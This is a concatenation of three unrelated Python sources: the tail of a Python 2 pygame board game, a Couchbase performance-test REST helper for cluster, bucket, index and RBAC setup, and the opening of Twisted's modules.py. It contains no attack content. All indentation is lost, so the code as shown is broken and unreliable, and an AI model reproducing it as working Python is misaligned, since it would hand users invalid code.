elif ev.key == pg.K_RIGHT:
print "### print right"
if self.your_turn == True and not self.won_game == True:
if self.cur_x + 1 <= CHESS_BOARD_BLOCK_COUNTS and self.cur_y <= CHESS_BOARD_BLOCK_COUNTS and self.cur_x >= 0 and self.cur_y >= 0:
self.last_put_X = self.cur_x
self.last_put_Y = self.cur_y
self.cur_x += 1
self.set_last_chess_prompt(self.cur_x,self.cur_y)
elif ev.key == pg.K_LEFT:
print "### print left"
if self.your_turn == True and not self.won_game == True:
if self.cur_x <= CHESS_BOARD_BLOCK_COUNTS and self.cur_y <= CHESS_BOARD_BLOCK_COUNTS and self.cur_x - 1 >= 0 and self.cur_y >= 0:
self.last_put_X = self.cur_x
self.last_put_Y = self.cur_y
self.cur_x -= 1
self.set_last_chess_prompt(self.cur_x,self.cur_y)
elif self.your_turn == True and ev.type == pg.MOUSEMOTION:
# TODO
#if TOUCH_SCREEN == False and self.your_turn == True:
if SHOW_MOUSEMOTION == True:
x,y = ev.pos[0]//self.block_width,ev.pos[1]//self.block_hight
if x < CHESS_BOARD_BLOCK_COUNTS + 1 and y < CHESS_BOARD_BLOCK_COUNTS + 1 and not self.won_game:
if self.grid[self.X][self.Y] == 0:
r = self.easefocus(self.X,self.Y)
if self.grid[x][y] == 0:
pg.display.update(self.scr.blit(self.white_image if self.role_id == "1" else self.black_image,
(x*self.block_width+self.board_margin_left - self.chess_radius,
y*self.block_hight + self.board_margin_top - self.chess_radius)))
self.X = x
self.Y = y
#else:
# print "#### ev.type:", str(ev.type)
def put_my_chess(self, x, y):
if x < CHESS_BOARD_BLOCK_COUNTS + 1 and y < CHESS_BOARD_BLOCK_COUNTS + 1:
if self.grid[x][y] == 0:
self.put_pawn(x,y, self.white_image if self.role_id == "1" else self.black_image)
self.put_chess_to_cloud((x,y))
self.your_turn = False
self.grid[x][y] = 1 if self.role_id == "1" else 2
def put_chess_to_cloud(self, (x,y)):
data_name="vlv_GMOVE_" + str(self.game_id)
data_id = self.node.dataId(data_name)
self.seq_id += 1
data_val = {'SeqID': self.seq_id, 'PosX': x, 'PosY': y, 'Status': DRAW}
if not self.node.setData(data_id, json.dumps(data_val)):
print("Fail to set data %s = %s" % (data_name, data_val))
else:
print("Data set chess pos (x:%s, y%s) to cloud" % (str(x), str(y))),
def update(self):
msg = 'Game Over'
if self.won_game:
x = self.right_board_x // 2
y = SCREEN_HIGHT // 2
if TOUCH_SCREEN == True:
msg_font_size = 50
else:
msg_font_size = 120
if self.role_id == "2":
msg = 'Got Winner!'
self.game_over, self.game_over_rect = self.make_text(msg, RED, (x,y), msg_font_size)
elif int(self.role_id) == self.pawn:
msg = 'You Win!'
self.game_over, self.game_over_rect = self.make_text(msg, RED, (x,y), msg_font_size)
else:
msg = 'You Lose!'
self.game_over, self.game_over_rect = self.make_text(msg, BLUE, (x,y), msg_font_size)
def render(self):
#self.screen.fill((255,255,255))
for button in self.buttons:
button.render(self.scr)
self.scr.blit(self.host_text, self.host_rect)
self.scr.blit(self.guest_text, self.guest_rect)
#self.scr.blit(self.games_won_text, self.games_won_rect)
#self.scr.blit(self.games_lost_text, self.games_lost_rect)
#self.scr.blit(self.sec_timelapse, self.sec_timelapse_rect)
#if self.lost_game or self.won_game():
if self.won_game:
self.scr.blit(self.overlay, (0,0))
self.scr.blit(self.game_over, self.game_over_rect)
#self.scr.blit(self.chess_cursor, self.chess_cursor_rect)
#pg.draw.rect(self.scr, (255, 255, 255, 127), pg.Rect(0, 0, 100, 75))
#self.scr.blit(self.sec_timelapse, self.sec_timelapse_rect)
#pg.draw.rect(self.scr, (255, 255, 255, 127), pg.Rect(0, 0, 100, 75))
#pg.draw.rect(self.scr, (255, 255, 255, 127), pg.Rect(0, 0, 100, 75))
def run(self):
while not self.done:
self.events()
self.update()
self.render()
pg.display.update()
#self.clock.tick(60)
def clean(self):
if self.fetch_data == True:
self.T.join(1)
pg.quit()
exit()
app = Game()
app.run()
app.clean()
| |
import json
import time
from collections import namedtuple
from typing import Callable, Dict, Iterator, List
import requests
from decorator import decorator
from requests.exceptions import ConnectionError
from logger import logger
from perfrunner.helpers.misc import pretty_dict
from perfrunner.settings import BucketSettings, ClusterSpec
MAX_RETRY = 20
RETRY_DELAY = 10
ANALYTICS_PORT = 8095
EVENTING_PORT = 8096
@decorator
def retry(method: Callable, *args, **kwargs):
r = namedtuple('request', ['url'])('')
for _ in range(MAX_RETRY):
try:
r = method(*args, **kwargs)
except ConnectionError:
time.sleep(RETRY_DELAY * 2)
continue
if r.status_code in range(200, 203):
return r
else:
logger.warn(r.text)
logger.warn('Retrying {}'.format(r.url))
time.sleep(RETRY_DELAY)
logger.interrupt('Request {} failed after {} attempts'.format(
r.url, MAX_RETRY
))
class RestHelper:
def __init__(self, cluster_spec: ClusterSpec):
self.rest_username, self.rest_password = cluster_spec.rest_credentials
self.auth = self.rest_username, self.rest_password
self.cluster_spec = cluster_spec
@retry
def get(self, **kwargs) -> requests.Response:
return requests.get(auth=self.auth, **kwargs)
def _post(self, **kwargs) -> requests.Response:
return requests.post(auth=self.auth, **kwargs)
@retry
def post(self, **kwargs) -> requests.Response:
return self._post(**kwargs)
def _put(self, **kwargs) -> requests.Response:
return requests.put(auth=self.auth, **kwargs)
@retry
def put(self, **kwargs) -> requests.Response:
return self._put(**kwargs)
def _delete(self, **kwargs) -> requests.Response:
return requests.delete(auth=self.auth, **kwargs)
def delete(self, **kwargs) -> requests.Response:
return self._delete(**kwargs)
def set_data_path(self, host: str, path: str):
logger.info('Configuring data path on {}'.format(host))
api = 'http://{}:8091/nodes/self/controller/settings'.format(host)
data = {
'path': path,
}
self.post(url=api, data=data)
def set_index_path(self, host: str, path: str):
logger.info('Configuring index path on {}'.format(host))
api = 'http://{}:8091/nodes/self/controller/settings'.format(host)
data = {
'index_path': path,
}
self.post(url=api, data=data)
def set_analytics_paths(self, host: str, paths: List[str]):
logger.info('Configuring analytics path on {}: {}'.format(host, paths))
api = 'http://{}:8091/nodes/self/controller/settings'.format(host)
data = {
'cbas_path': paths,
}
self.post(url=api, data=data)
def set_auth(self, host: str):
logger.info('Configuring cluster authentication: {}'.format(host))
api = 'http://{}:8091/settings/web'.format(host)
data = {
'username': self.rest_username, 'password': self.rest_password,
'port': 'SAME'
}
self.post(url=api, data=data)
def rename(self, host: str):
logger.info('Changing server name: {}'.format(host))
api = 'http://{}:8091/node/controller/rename'.format(host)
data = {'hostname': host}
self.post(url=api, data=data)
def set_mem_quota(self, host: str, mem_quota: str):
logger.info('Configuring data RAM quota: {} MB'.format(mem_quota))
api = 'http://{}:8091/pools/default'.format(host)
data = {'memoryQuota': mem_quota}
self.post(url=api, data=data)
def set_index_mem_quota(self, host: str, mem_quota: int):
logger.info('Configuring index RAM quota: {} MB'.format(mem_quota))
api = 'http://{}:8091/pools/default'.format(host)
data = {'indexMemoryQuota': mem_quota}
self.post(url=api, data=data)
def set_fts_index_mem_quota(self, host: str, mem_quota: int):
logger.info('Configuring FTS RAM quota: {} MB'.format(mem_quota))
api = 'http://{}:8091/pools/default'.format(host)
data = {'ftsMemoryQuota': mem_quota}
self.post(url=api, data=data)
def set_analytics_mem_quota(self, host: str, mem_quota: int):
logger.info('Configuring Analytics RAM quota: {} MB'.format(mem_quota))
api = 'http://{}:8091/pools/default'.format(host)
data = {'cbasMemoryQuota': mem_quota}
self.post(url=api, data=data)
def set_eventing_mem_quota(self, host: str, mem_quota: int):
logger.info('Configuring eventing RAM quota: {} MB'.format(mem_quota))
api = 'http://{}:8091/pools/default'.format(host)
data = {'eventingMemoryQuota': mem_quota}
self.post(url=api, data=data)
def set_query_settings(self, host: str, override_settings: dict):
api = 'http://{}:8093/admin/settings'.format(host)
settings = self.get(url=api).json()
for override, value in override_settings.items():
if override not in settings:
logger.error('Cannot change query setting {} to {}, setting invalid'
.format(override, value))
continue
settings[override] = value
logger.info('Changing {} to {}'.format(override, value))
self.post(url=api, data=json.dumps(settings))
def get_query_settings(self, host: str):
api = 'http://{}:8093/admin/settings'.format(host)
return self.get(url=api).json()
def set_index_settings(self, host: str, settings: dict):
api = 'http://{}:9102/settings'.format(host)
curr_settings = self.get_index_settings(host)
for option, value in settings.items():
if option in curr_settings:
logger.info('Changing {} to {}'.format(option, value))
self.post(url=api, data=json.dumps({option: value}))
else:
logger.warn('Skipping unknown option: {}'.format(option))
def get_index_settings(self, host: str) -> dict:
api = 'http://{}:9102/settings?internal=ok'.format(host)
return self.get(url=api).json()
def get_gsi_stats(self, host: str) -> dict:
api = 'http://{}:9102/stats'.format(host)
return self.get(url=api).json()
def create_index(self, host: str, bucket: str, name: str, field: str,
storage: str = 'memdb'):
api = 'http://{}:9102/createIndex'.format(host)
data = {
'index': {
'bucket': bucket,
'using': storage,
'name': name,
'secExprs': ['`{}`'.format(field)],
'exprType': 'N1QL',
'isPrimary': False,
'where': '',
'deferred': False,
'partitionKey': '',
'partitionScheme': 'SINGLE',
},
'type': 'create',
'version': 1,
}
logger.info('Creating index {}'.format(pretty_dict(data)))
self.post(url=api, data=json.dumps(data))
def set_services(self, host: str, services: str):
logger.info('Configuring services on {}: {}'.format(host, services))
api = 'http://{}:8091/node/controller/setupServices'.format(host)
data = {'services': services}
self.post(url=api, data=data)
def add_node(self, host: str, new_host: str, services: str = None):
logger.info('Adding new node: {}'.format(new_host))
api = 'http://{}:8091/controller/addNode'.format(host)
data = {
'hostname': new_host,
'user': self.rest_username,
'password': self.rest_password,
'services': services,
}
self.post(url=api, data=data)
def rebalance(self, host: str, known_nodes: List[str],
ejected_nodes: List[str]):
logger.info('Starting rebalance')
api = 'http://{}:8091/controller/rebalance'.format(host)
known_nodes = ','.join(map(self.get_otp_node_name, known_nodes))
ejected_nodes = ','.join(map(self.get_otp_node_name, ejected_nodes))
data = {
'knownNodes': known_nodes,
'ejectedNodes': ejected_nodes
}
self.post(url=api, data=data)
def get_counters(self, host: str) -> dict:
api = 'http://{}:8091/pools/default'.format(host)
return self.get(url=api).json()['counters']
def is_not_balanced(self, host: str) -> int:
counters = self.get_counters(host)
return counters.get('rebalance_start') - counters.get('rebalance_success')
def get_failover_counter(self, host: str) -> int:
counters = self.get_counters(host)
return counters.get('failover_node')
def get_tasks(self, host: str) -> dict:
api = 'http://{}:8091/pools/default/tasks'.format(host)
return self.get(url=api).json()
def get_task_status(self, host: str, task_type: str) -> [bool, float]:
for task in self.get_tasks(host):
if task['type'] == task_type:
is_running = task['status'] == 'running'
progress = task.get('progress')
return is_running, progress
return False, 0
def delete_bucket(self, host: str, name: str):
logger.info('Deleting new bucket: {}'.format(name))
api = 'http://{host}:8091/pools/default/buckets/{bucket}'.format(host=host, bucket=name)
self.delete(url=api)
def create_bucket(self,
host: str,
name: str,
password: str,
ram_quota: int,
replica_number: int,
replica_index: int,
eviction_policy: str,
bucket_type: str,
conflict_resolution_type: str = None,
compression_mode: str = None):
logger.info('Adding new bucket: {}'.format(name))
api = 'http://{}:8091/pools/default/buckets'.format(host)
data = {
'name': name,
'bucketType': bucket_type,
'ramQuotaMB': ram_quota,
'evictionPolicy': eviction_policy,
'flushEnabled': 1,
'replicaNumber': replica_number,
'authType': 'sasl',
'saslPassword': password,
}
if bucket_type == BucketSettings.BUCKET_TYPE:
data['replicaIndex'] = replica_index
if conflict_resolution_type:
data['conflictResolutionType'] = conflict_resolution_type
if compression_mode:
data['compressionMode'] = compression_mode
logger.info('Bucket configuration: {}'.format(pretty_dict(data)))
self.post(url=api, data=data)
def flush_bucket(self, host: str, bucket: str):
logger.info('Flushing bucket: {}'.format(bucket))
api = 'http://{}:8091/pools/default/buckets/{}/controller/doFlush'.format(host, bucket)
self.post(url=api)
def configure_auto_compaction(self, host, settings):
logger.info('Applying auto-compaction settings: {}'.format(settings))
api = 'http://{}:8091/controller/setAutoCompaction'.format(host)
data = {
'databaseFragmentationThreshold[percentage]': settings.db_percentage,
'viewFragmentationThreshold[percentage]': settings.view_percentage,
'parallelDBAndViewCompaction': str(settings.parallel).lower()
}
self.post(url=api, data=data)
def get_auto_compaction_settings(self, host: str) -> dict:
api = 'http://{}:8091/settings/autoCompaction'.format(host)
return self.get(url=api).json()
def get_bucket_stats(self, host: str, bucket: str) -> dict:
api = 'http://{}:8091/pools/default/buckets/{}/stats'.format(host,
bucket)
return self.get(url=api).json()
def get_xdcr_stats(self, host: str, bucket: str) -> dict:
api = 'http://{}:8091/pools/default/buckets/@xdcr-{}/stats'.format(host,
bucket)
return self.get(url=api).json()
def add_remote_cluster(self,
local_host: str,
remote_host: str,
name: str,
secure_type: str,
certificate: str):
logger.info('Adding a remote cluster: {}'.format(remote_host))
api = 'http://{}:8091/pools/default/remoteClusters'.format(local_host)
payload = {
'name': name,
'hostname': remote_host,
'username': self.rest_username,
'password': self.rest_password,
}
if secure_type:
payload['secureType'] = secure_type
if certificate:
payload['demandEncryption'] = 1
payload['certificate'] = certificate
self.post(url=api, data=payload)
def get_remote_clusters(self, host: str) -> List[Dict]:
logger.info('Getting remote clusters')
api = 'http://{}:8091/pools/default/remoteClusters'.format(host)
return self.get(url=api).json()
def create_replication(self, host: str, params: dict):
logger.info('Starting replication with parameters {}'.format(params))
api = 'http://{}:8091/controller/createReplication'.format(host)
self.post(url=api, data=params)
def trigger_bucket_compaction(self, host: str, bucket: str):
logger.info('Triggering bucket {} compaction'.format(bucket))
api = 'http://{}:8091/pools/default/buckets/{}/controller/compactBucket'\
.format(host, bucket)
self.post(url=api)
def trigger_index_compaction(self, host: str, bucket: str, ddoc: str):
logger.info('Triggering ddoc {} compaction, bucket {}'.format(
ddoc, bucket
))
api = 'http://{}:8091/pools/default/buckets/{}/ddocs/_design%2F{}/controller/compactView'\
.format(host, bucket, ddoc)
self.post(url=api)
def create_ddoc(self, host: str, bucket: str, ddoc_name: str, ddoc: dict):
logger.info('Creating new ddoc {}, bucket {}'.format(
ddoc_name, bucket
))
api = 'http://{}:8091/couchBase/{}/_design/{}'.format(
host, bucket, ddoc_name)
data = json.dumps(ddoc)
headers = {'Content-type': 'application/json'}
self.put(url=api, data=data, headers=headers)
def query_view(self, host: str, bucket: str, ddoc_name: str,
view_name: str, params: dict):
logger.info('Querying view: {}/_design/{}/_view/{}'.format(
bucket, ddoc_name, view_name
))
api = 'http://{}:8091/couchBase/{}/_design/{}/_view/{}'.format(
host, bucket, ddoc_name, view_name)
self.get(url=api, params=params)
def get_version(self, host: str) -> str:
logger.info('Getting Couchbase Server version')
api = 'http://{}:8091/pools/'.format(host)
r = self.get(url=api).json()
return r['implementationVersion'] \
.replace('-rel-enterprise', '') \
.replace('-enterprise', '') \
.replace('-community', '')
def is_community(self, host: str) -> bool:
logger.info('Getting Couchbase Server edition')
api = 'http://{}:8091/pools/'.format(host)
r = self.get(url=api).json()
return 'community' in r['implementationVersion']
def get_memcached_port(self, host: str) -> int:
logger.info('Getting memcached port from {}'.format(host))
api = 'http://{}:8091/nodes/self'.format(host)
r = self.get(url=api).json()
return r['ports']['direct']
def get_otp_node_name(self, host: str) -> str:
logger.info('Getting OTP node name from {}'.format(host))
api = 'http://{}:8091/nodes/self'.format(host)
r = self.get(url=api).json()
return r['otpNode']
def set_internal_settings(self, host: str, data: dict):
logger.info('Updating internal settings: {}'.format(data))
api = 'http://{}:8091/internalSettings'.format(host)
self.post(url=api, data=data)
def set_xdcr_cluster_settings(self, host: str, data: dict):
logger.info('Updating xdcr cluster settings: {}'.format(data))
api = 'http://{}:8091/settings/replications'.format(host)
self.post(url=api, data=data)
def run_diag_eval(self, host: str, cmd: str):
api = 'http://{}:8091/diag/eval'.format(host)
self.post(url=api, data=cmd)
def enable_auto_failover(self, host: str):
logger.info('Enabling auto-failover with the minimum timeout')
api = 'http://{}:8091/settings/autoFailover'.format(host)
for timeout in 5, 30:
data = {'enabled': 'true',
'timeout': timeout,
'failoverOnDataDiskIssues[enabled]': 'true',
'failoverOnDataDiskIssues[timePeriod]': 10
}
r = self._post(url=api, data=data)
if r.status_code == 200:
break
def get_certificate(self, host: str) -> str:
logger.info('Getting remote certificate')
api = 'http://{}:8091/pools/default/certificate'.format(host)
return self.get(url=api).text
def fail_over(self, host: str, node: str):
logger.info('Failing over node: {}'.format(node))
api = 'http://{}:8091/controller/failOver'.format(host)
data = {'otpNode': self.get_otp_node_name(node)}
self.post(url=api, data=data)
def graceful_fail_over(self, host: str, node: str):
logger.info('Gracefully failing over node: {}'.format(node))
api = 'http://{}:8091/controller/startGracefulFailover'.format(host)
data = {'otpNode': self.get_otp_node_name(node)}
self.post(url=api, data=data)
def add_back(self, host: str, node: str):
logger.info('Adding node back: {}'.format(node))
api = 'http://{}:8091/controller/reAddNode'.format(host)
data = {'otpNode': self.get_otp_node_name(node)}
self.post(url=api, data=data)
def set_delta_recovery_type(self, host: str, node: str):
logger.info('Enabling delta recovery: {}'.format(node))
api = 'http://{}:8091/controller/setRecoveryType'.format(host)
data = {
'otpNode': self.get_otp_node_name(node),
'recoveryType': 'delta' # alt: full
}
self.post(url=api, data=data)
def node_statuses(self, host: str) -> dict:
api = 'http://{}:8091/nodeStatuses'.format(host)
data = self.get(url=api).json()
return {node: info['status'] for node, info in data.items()}
def node_statuses_v2(self, host: str) -> dict:
api = 'http://{}:8091/pools/default'.format(host)
data = self.get(url=api).json()
return {node['hostname']: node['status'] for node in data['nodes']}
def get_node_stats(self, host: str, bucket: str) -> Iterator:
api = 'http://{}:8091/pools/default/buckets/{}/nodes'.format(host,
bucket)
data = self.get(url=api).json()
for server in data['servers']:
api = 'http://{}:8091{}'.format(host, server['stats']['uri'])
data = self.get(url=api).json()
yield data['hostname'], data['op']['samples']
def get_vbmap(self, host: str, bucket: str) -> dict:
logger.info('Reading vbucket map: {}/{}'.format(host, bucket))
api = 'http://{}:8091/pools/default/buckets/{}'.format(host, bucket)
data = self.get(url=api).json()
return data['vBucketServerMap']['vBucketMap']
def get_server_list(self, host: str, bucket: str) -> List[str]:
api = 'http://{}:8091/pools/default/buckets/{}'.format(host, bucket)
data = self.get(url=api).json()
return [server.split(':')[0]
for server in data['vBucketServerMap']['serverList']]
def exec_n1ql_statement(self, host: str, statement: str) -> dict:
api = 'http://{}:8093/query/service'.format(host)
data = {
'statement': statement,
}
response = self.post(url=api, data=data)
return response.json()
def explain_n1ql_statement(self, host: str, statement: str):
statement = 'EXPLAIN {}'.format(statement)
return self.exec_n1ql_statement(host, statement)
def get_query_stats(self, host: str) -> dict:
logger.info('Getting query engine stats')
api = 'http://{}:8093/admin/stats'.format(host)
response = self.get(url=api)
return response.json()
def delete_fts_index(self, host: str, index: str):
logger.info('Deleting FTS index: {}'.format(index))
api = 'http://{}:8094/api/index/{}'.format(host, index)
self.delete(url=api)
def create_fts_index(self, host: str, index: str, definition: dict):
logger.info('Creating a new FTS index: {}'.format(index))
api = 'http://{}:8094/api/index/{}'.format(host, index)
headers = {'Content-Type': 'application/json'}
data = json.dumps(definition, ensure_ascii=False)
self.put(url=api, data=data, headers=headers)
def get_fts_doc_count(self, host: str, index: str) -> int:
api = 'http://{}:8094/api/index/{}/count'.format(host, index)
response = self.get(url=api).json()
return response['count']
def get_fts_stats(self, host: str) -> dict:
api = 'http://{}:8094/api/nsstats'.format(host)
response = self.get(url=api)
return response.json()
def get_elastic_stats(self, host: str) -> dict:
api = "http://{}:9200/_stats".format(host)
response = self.get(url=api)
return response.json()
def delete_elastic_index(self, host: str, index: str):
logger.info('Deleting Elasticsearch index: {}'.format(index))
api = 'http://{}:9200/{}'.format(host, index)
self.delete(url=api)
def create_elastic_index(self, host: str, index: str, definition: dict):
logger.info('Creating a new Elasticsearch index: {}'.format(index))
api = 'http://{}:9200/{}'.format(host, index)
headers = {'Content-Type': 'application/json'}
data = json.dumps(definition, ensure_ascii=False)
self.put(url=api, data=data, headers=headers)
def get_elastic_doc_count(self, host: str, index: str) -> int:
api = "http://{}:9200/{}/_count".format(host, index)
response = self.get(url=api).json()
return response['count']
def get_index_status(self, host: str) -> dict:
api = 'http://{}:9102/getIndexStatus'.format(host)
response = self.get(url=api)
return response.json()
def get_index_stats(self, hosts: List[str]) -> dict:
api = 'http://{}:9102/stats'
data = {}
for host in hosts:
host_data = self.get(url=api.format(host))
data.update(host_data.json())
return data
def get_index_num_connections(self, host: str) -> int:
api = 'http://{}:9102/stats'.format(host)
response = self.get(url=api).json()
return response['num_connections']
def get_index_storage_stats(self, host: str) -> str:
api = 'http://{}:9102/stats/storage'.format(host)
return self.get(url=api).text
def get_index_storage_stats_mm(self, host: str) -> str:
api = 'http://{}:9102/stats/storage/mm'.format(host)
return self.get(url=api).text
def get_audit_settings(self, host: str) -> dict:
logger.info('Getting current audit settings')
api = 'http://{}:8091/settings/audit'.format(host)
return self.get(url=api).json()
def enable_audit(self, host: str, disabled: List[str]):
logger.info('Enabling audit')
api = 'http://{}:8091/settings/audit'.format(host)
data = {
'auditdEnabled': 'true',
}
if disabled:
data['disabled'] = ','.join(disabled)
self.post(url=api, data=data)
def get_rbac_roles(self, host: str) -> List[dict]:
logger.info('Getting the existing RBAC roles')
api = 'http://{}:8091/settings/rbac/roles'.format(host)
return self.get(url=api).json()
def delete_rbac_user(self, host: str, bucket: str):
logger.info('Deleting an RBAC user: {}'.format(bucket))
for domain in 'local', 'builtin':
api = 'http://{}:8091/settings/rbac/users/{}/{}'.format(host,
domain,
bucket)
r = self._delete(url=api)
if r.status_code == 200:
break
def add_rbac_user(self, host: str, user: str, password: str,
roles: List[str]):
logger.info('Adding an RBAC user: {}, roles: {}'.format(user,
roles))
data = {
'password': password,
'roles': ','.join(roles),
}
for domain in 'local', 'builtin':
api = 'http://{}:8091/settings/rbac/users/{}/{}'.format(host,
domain,
user)
r = self._put(url=api, data=data)
if r.status_code == 200:
break
def analytics_node_active(self, host: str) -> bool:
logger.info('Checking if analytics node is active: {}'.format(host))
api = 'http://{}:{}/analytics/cluster'.format(host, ANALYTICS_PORT)
status = self.get(url=api).json()
return status["state"] == "ACTIVE"
def exec_analytics_statement(self, analytics_node: str,
statement: str) -> requests.Response:
api = 'http://{}:{}/analytics/service'.format(analytics_node,
ANALYTICS_PORT)
data = {
'statement': statement
}
return self.post(url=api, data=data)
def get_analytics_stats(self, analytics_node: str) -> dict:
api = 'http://{}:9110/analytics/node/stats'.format(analytics_node)
return self.get(url=api).json()
def create_function(self, node: str, func: dict, name: str):
logger.info('Creating function on node {}: {}'.format(node,
pretty_dict(func)))
api = 'http://{}:8091/_p/event/saveAppTempStore/?name={}'.format(node,
name)
self.post(url=api, data=json.dumps(func))
def deploy_function(self, node: str, func: dict, name: str):
logger.info('Deploying function on node {}'.format(node))
api = 'http://{}:8091/_p/event/setApplication/?name={}'.format(node,
name)
self.post(url=api, data=json.dumps(func))
def get_num_events_processed(self, event: str, node: str, name: str) -> int:
logger.info('get stats on node {} for {}'.format(node, name))
data = {}
all_stats = self.get_eventing_stats(node=node)
for stat in all_stats:
if name == stat["function_name"]:
data = stat["event_processing_stats"]
break
logger.info(data)
if event in data:
return data[event]
return 0
def get_deployed_apps(self, node: str):
logger.info('get deployed apps on node {}'.format(node))
api = 'http://{}:{}/getDeployedApps'.format(node, EVENTING_PORT)
return self.get(url=api).json()
def get_eventing_stats(self, node: str, full_stats: bool = False) -> dict:
logger.info('get eventing stats on node {}'.format(node))
api = 'http://{}:{}/api/v1/stats'.format(node, EVENTING_PORT)
if full_stats:
api += "?type=full"
return self.get(url=api).json()
def get_active_nodes_by_role(self, master_node: str, role: str) -> List[str]:
active_nodes = self.node_statuses(master_node)
active_nodes_by_role = []
for node in self.cluster_spec.servers_by_role(role):
if node + ":8091" in active_nodes:
active_nodes_by_role.append(node)
return active_nodes_by_role
def upload_cluster_certificate(self, node: str):
logger.info("Uploading cluster certificate to {}".format(node))
api = 'http://{}:8091/controller/uploadClusterCA'.format(node)
data = open('./certificates/inbox/ca.pem', 'rb').read()
self.post(url=api, data=data)
def reload_cluster_certificate(self, node: str):
logger.info("Reloading certificate on {}".format(node))
api = 'http://{}:8091/node/controller/reloadCertificate'.format(node)
self.post(url=api)
def enable_certificate_auth(self, node: str):
logger.info("Enabling certificate-based client auth on {}".format(node))
api = 'http://{}:8091/settings/clientCertAuth'.format(node)
data = open('./certificates/inbox/config.json', 'rb').read()
self.post(url=api, data=data)
| |
# -*- test-case-name: twisted.test.test_modules -*-
# Copyright (c) 2006-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module aims to provide a unified, object-oriented view of Python's
runtime hierarchy.
Python is a very dynamic language with wide variety of introspection utilities.
However, these utilities can be hard to use, because there is no consistent
API. The introspection API in python is made up of attributes (__name__,
__module__, func_name, etc) on instances, modules, classes and functions which
vary between those four types, utility modules such as 'inspect' which provide
some functionality, the 'imp' module, the "compiler" module, the semantics of
PEP 302 support, and setuptools, among other things.
At the top, you have "PythonPath", an abstract representation of sys.path which
includes methods to locate top-level modules, with or without loading them.
The top-level exposed functions in this module for accessing the system path
are "walkModules", "iterModules", and "getModule".
From most to least specific, here are the objects provided::
PythonPath # sys.path
|
v
PathEntry # one entry on sys.path: an importer
|
v
PythonModule # a module or package that can be loaded
|
v
PythonAttribute # an attribute of a module (function or class)
|
v
PythonAttribute # an attribute of a function or class
|
v
...
Here's an example of idiomatic usage: this is what you would do to list all of
the modules outside the standard library's python-files directory::
import os
stdlibdir = os.path.dirname(os.__file__)
from twisted.python.modules import iterModules
for modinfo in iterModules():
if (modinfo.pathEntry.filePath.path != stdlibdir
and not modinfo.isPackage()):
print 'unpackaged: %s: %s' % (
modinfo.name, modinfo.filePath.path)
"""
__metaclass__ = type
# let's try to keep path imports to a minimum...
from os.path import dirname, split as splitpath
import sys
import zipimport
import inspect
import warnings
from zope.interface import Interface, implements
from twisted.python.components import registerAdapter
from twisted.python.filepath import FilePath, UnlistableError
from twisted.python.zippath import ZipArchive
from twisted.python.reflect import namedAny
_nothing = object()
PYTHON_EXTENSIONS = ['.py']
OPTIMIZED_MODE = __doc__ is None
if OPTIMIZED_MODE:
PYTHON_EXTENSIONS.append('.pyo')
else:
PYTHON_EXTENSIONS.append('.pyc')
def _isPythonIdentifier(string):
"""
cheezy fake test for proper identifier-ness.
@param string: a str which might or might not be a valid python identifier.
@return: True or False
"""
return (' ' not in string and
'.' not in string and
'-' not in string)
def _isPackagePath(fpath):
# Determine if a FilePath-like object is a Python package. TODO: deal with
# __init__module.(so|dll|pyd)?
extless = fpath.splitext()[0]
basend = splitpath(extless)[1]
return basend == "__init__"
class _ModuleIteratorHelper:
"""
This mixin provides common behavior between python module and path entries,
since the mechanism for searching sys.path and __path__ attributes is
remarkably similar.
"""
def iterModules(self):
"""
Loop over the modules present below this entry or package on PYTHONPATH.
For modules which are not packages, this will yield nothing.
For packages and path entries, this will only yield modules one level
down; i.e. if there is a package a.b.c, iterModules on a will only
return a.b. If you want to descend deeply, use walkModules.
@return: a generator which yields PythonModule instances that describe
modules which can be, or have been, imported.
"""
yielded = {}
if not self.filePath.exists():
return
for placeToLook in self._packagePaths():
try:
children = placeToLook.children()
except UnlistableError:
continue
children.sort()
for potentialTopLevel in children:
ext = potentialTopLevel.splitext()[1]
potentialBasename = potentialTopLevel.basename()[:-len(ext)]
if ext in PYTHON_EXTENSIONS:
# TODO: this should be a little choosier about which path entry
# it selects first, and it should do all the .so checking and
# crud
if not _isPythonIdentifier(potentialBasename):
continue
modname = self._subModuleName(potentialBasename)
if modname.split(".")[-1] == '__init__':
# This marks the directory as a package so it can't be
# a module.
continue
if modname not in yielded:
yielded[modname] = True
pm = PythonModule(modname, potentialTopLevel, self._getEntry())
assert pm != self
yield pm
else:
if (ext or not _isPythonIdentifier(potentialBasename)
or not potentialTopLevel.isdir()):
continue
modname = self._subModuleName(potentialTopLevel.basename())
for ext in PYTHON_EXTENSIONS:
initpy = potentialTopLevel.child("__init__"+ext)
if initpy.exists():
yielded[modname] = True
pm = PythonModule(modname, initpy, self._getEntry())
assert pm != self
yield pm
break
def walkModules(self, importPackages=False):
"""
Similar to L{iterModules}, this yields self, and then every module in my
package or entry, and every submodule in each package or entry.
In other words, this is deep, and L{iterModules} is shallow.
"""
yield self
for package in self.iterModules():
for module in package.walkModules(importPackages=importPackages):
yield module
def _subModuleName(self, mn):
"""
This is a hook to provide packages with the ability to specify their names
as a prefix to submodules here.
"""
return mn
def _packagePaths(self):
"""
Implement in subclasses to specify where to look for modules.
@return: iterable of FilePath-like objects.
"""
raise NotImplementedError()
def _getEntry(self):
"""
Implement in subclasses to specify what path entry submodules will come
from.
@return: a PathEntry instance.
"""
raise NotImplementedError()
def __getitem__(self, modname):
"""
Retrieve a module from below this path or package.
@param modname: a str naming a module to be loaded. For entries, this
is a top-level, undotted package name, and for packages it is the name
of the module without the package prefix. For example, if you have a
PythonModule representing the 'twisted' package, you could use::
twistedPackageObj['python']['modules']
to retrieve this module.
@raise: KeyError if the module is not found.
@return: a PythonModule.
"""
for module in self.iterModules():
if module.name == self._subModuleName(modname):
return module
raise KeyError(modname)
def __iter__(self):
"""
Implemented to raise NotImplementedError for clarity, so that attempting to
loop over this object won't call __getitem__.
Note: in the future there might be some sensible default for iteration,
like 'walkEverything', so this is deliberately untested and undefined
behavior.
"""
raise NotImplementedError()
class PythonAttribute:
"""
I represent a function, class, or other object that is present.
@ivar name: the fully-qualified python name of this attribute.
@ivar onObject: a reference to a PythonModule or other PythonAttribute that
is this attribute's logical parent.
@ivar name: the fully qualified python name of the attribute represented by
this class.
"""
def __init__(self, name, onObject, loaded, pythonValue):
"""
Create a PythonAttribute. This is a private constructor. Do not construct
me directly, use PythonModule.iterAttributes.
@param name: the FQPN
@param onObject: see ivar
@param loaded: always True, for now
@param pythonValue: the value of the attribute we're pointing to.
"""
self.name = name
self.onObject = onObject
self._loaded = loaded
self.pythonValue = pythonValue
